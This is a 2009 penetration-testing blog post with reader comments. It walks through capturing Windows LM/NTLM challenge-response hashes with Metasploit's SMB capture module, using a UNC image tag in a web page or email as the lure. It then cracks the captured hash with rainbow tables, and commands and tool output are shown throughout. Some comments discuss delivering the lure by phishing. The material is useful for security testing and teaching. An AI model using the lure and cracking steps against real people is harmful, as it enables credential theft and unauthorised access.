Monday, April 6, 2009

Using the Metasploit SMB Sniffer Module

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says: relaying the SMB session back to another host. It used to be the same host, but now, post MS08-068, you have to pick another system on the network. It doesn't matter which system, just not the same one. (I'll try to cover this in another blog post soon.)

Additionally, the SMB Relay module provides a random challenge for each attempt and doesn't log those challenges anywhere that you could go back and use. So that pretty much rules out using the hashes you see in the output for password cracking.

For background, the SMB Relay output looks like this, which looks just like the output from the module that will work :-(

[*] Received 192.168.0.103:2281 XPSP1VM\vmwareXP LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

So what are we to do? Use the SMB Sniffer module of course!

The SMB sniffer module allows you to capture LM/NTLM hashes that can be cracked later. It uses a known challenge key which allows you to crack the hash offline.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > info

Name: Authentication Capture: SMB
Version: 5966

Provided by:
hdm

Description:
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path(\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

We need to force a victim to authenticate to Metasploit. The easiest way is to embed a UNC link into a web page or email.

Example: <img src="\\networkIP\share\1.gif">

Once the victim's browser tries to authenticate, the sniffer module will capture the hashes (which can be cracked later using rainbow tables). You'll notice the difference between this module and SMB Relay, which issues a random challenge, making cracking impossible. So if you want to crack passwords, use the server/capture/smb auxiliary module; if you want to try to get a shell, use the smb_relay exploit module.

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > run
[*] Auxiliary module running as background job
msf auxiliary(smb) >
[*] Server started.
[*] Captured 192.168.0.101:57794 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:44641 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1
[*] Captured 192.168.0.101:49777 XPSP1VM\Administrator LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d NTHASH:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595 OS:Windows 2002 Service Pack 1 2600 LM:Windows 2002 5.1

We can now use HALFLM rainbow tables with the 1122334455667788 challenge to crack the first half of the password.

**We only take the first 16 hex characters of the LM hash output (the first 8 bytes of the LM response, which are computed from the first 7 characters of the password only).

LMHASH:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d

We can then use rainbow tables to crack the first half:

$ ./rcracki *.rti -h 76365e2d142b5612
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti:
reading...
264241152 bytes read, disk access time: 4.97 s
verifying the file...
searching for 1 hash...
plaintext of 76365e2d142b5612 is PASSWOR
cryptanalysis time: 5.24 s

statistics
-------------------------------------------------------
plaintext found: 1 of 1 (100.00%)
total disk access time: 4.97 s
total cryptanalysis time: 5.24 s
total chain walk step: 1783216
total false alarm: 591
total chain walk step due to false alarm: 703255

result
-------------------------------------------------------
76365e2d142b5612 PASSWOR hex:50415353574f52

You will have to guess or brute-force the rest :-( but thankfully there is a tool in your Metasploit tools directory to help you do just that!

$ ruby halflm_second.rb

Usage: halflm_second.rb

OPTIONS:

-h Display this help information
-n The encypted LM hash to crack
-p The decrypted LANMAN password for bytes 1-7

$ ruby halflm_second.rb -n 76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d -p PASSWOR
[*] Trying one character...
[*] Cracked: PASSWORD

19 comments:

Dizzle said...

Great Work. Very Interesting.

Cheers on the top 5 ranking. You deserve it. Lots of work goes into these articles.

Looking forward to the article about SMB relaying. Does the 3rd party in the attack have to be a DC or will any domain member work?

Cl@rity_533k4 said...

Very interesting article..

Btw did you leave a number in the challenge out on purpose or is it a type mismatch..

CG said...

I didn't leave anything out on purpose. Can you give me a bit more detail on what you are asking?

Anonymous said...

Nice work, but I have one question: I saw you didn't use the 112233455667788 challenge.
Is it necessary for the rainbow attack?

CG said...

The SMB sniffer handles the challenge

John Fairfield said...

Great stuff...
Quick question though, when I attempt to connect to the share from an XPSP3 VM (not in a domain), the responses it automatically sends first are not the right hashes. The LM hash is always cd72dfc6e6d040a4cd72dfc6e6d040a4cd72dfc6e6d040a4 (tried it from a number of systems). However, if I type the username and pass in the popup auth box, then the right hashes are sent.

What could be the reason that the system is not trying to automatically authenticate with the right creds?

Appreciate the help and congrats on the top 5, you deserve it.

Cl@rity_533k4 said...

As far I know the static challenge is:
1122334455667788
so there is a missing 4 in yours.
Regards.

CG said...

@Cl@rity_533k4

Yeah, I see now, there was a typo in the post. I added the other 4.

@john I have no idea. Sorry.

Anonymous said...

Can you advise where to get the rcracki for Linux source code that works? The freerainbowtables forum and bulletin board just seem to think the source code is corrupted and offer very little advice on the multitude of compilation errors. Or perhaps you could advise how to compile in Linux. Thanks

Anonymous said...

Hmm
If the attacker was sitting out on the Internet and sent a phishing email to users behind a corporate firewall this should still work yes? The clients would open the email, with the url you mention and then attempt to authenticate true?

Anonymous said...

Authentication only works if the site is in the internal zone. Otherwise Iexplorer won't do NTLM auth with logged-on credentials.

solardiz said...

Instead of halflm_second.rb, you could use John the Ripper with the jumbo patch applied, which contains:

host!user:~/john/john-1.7.6-jumbo-4$ ls doc/NETNTLM_README src/*NET*LM*
doc/NETNTLM_README src/NETLM_fmt.c src/NETNTLM_fmt.c
src/NETHALFLM_fmt.c src/NETLMv2_fmt.c src/NETNTLMv2_fmt.c

This stuff was contributed by JoMo-Kun. You can also find some info on it (and an older revision of it) on his website:

http://www.foofus.net/~jmk/smbchallenge.html

Just thought I'd mention this option as well.

CG said...

@solardiz

cool thanks!

aerokid240 said...

Hey man, great post. My problem now is getting rcracki to compile/install on BT 4. Any suggestions/pointers on how you got yours up and running?

CG said...

@aerokid240

Without any errors, I or anyone else probably can't help you.

Anonymous said...

@John:

Windows tries anonymous logons first.

Jim said...

Great article Chris.
Problem I'm having is that rcracki can't find the hash you mentioned in your article.
1. I copied the four tables and four index files to /tables on a BT5RC2 box.
2. I did rcracki *.rti -h 76365e2d142b5612 and rcracki told me it couldn't find the hash.
Not sure what I did wrong.
Compilation of rcracki went with some warnings but no errors. Binary seemed to work ok just can't find the PASSWOR hash in the downloaded tables. Have you had troubles with corrupted tables maybe?

Anonymous said...

Chris, your article is 3 years old and still providing value! Just helped me in a pentest to crack the password for an LM challenge/response I gathered from an ettercap SMB MITM and gain that first foothold. One thing that should be noted for everyone, which Chris did use but I missed the first time around, is you *must* use msf's "auxiliary/server/capture/smb". Some ettercap MITM SMB videos use the smbrelay exploit instead. Do *not* use smbrelay if your goal is to crack LM challenge/response passwords using rainbow tables, because it will not set the server challenge to be 1122334455667788 (capture/smb does) and the stock lhhalfchall rainbow tables out on the net (GARR) appear to have been generated using that default challenge. Of course you could generate your own rainbow tables using your server challenge or rely on John or Cain brute force with a supplied challenge, but good luck with that finishing within your engagement timeframe if it's a decent password.

Anonymous said...

This does not work if the user is using chrome or firefox.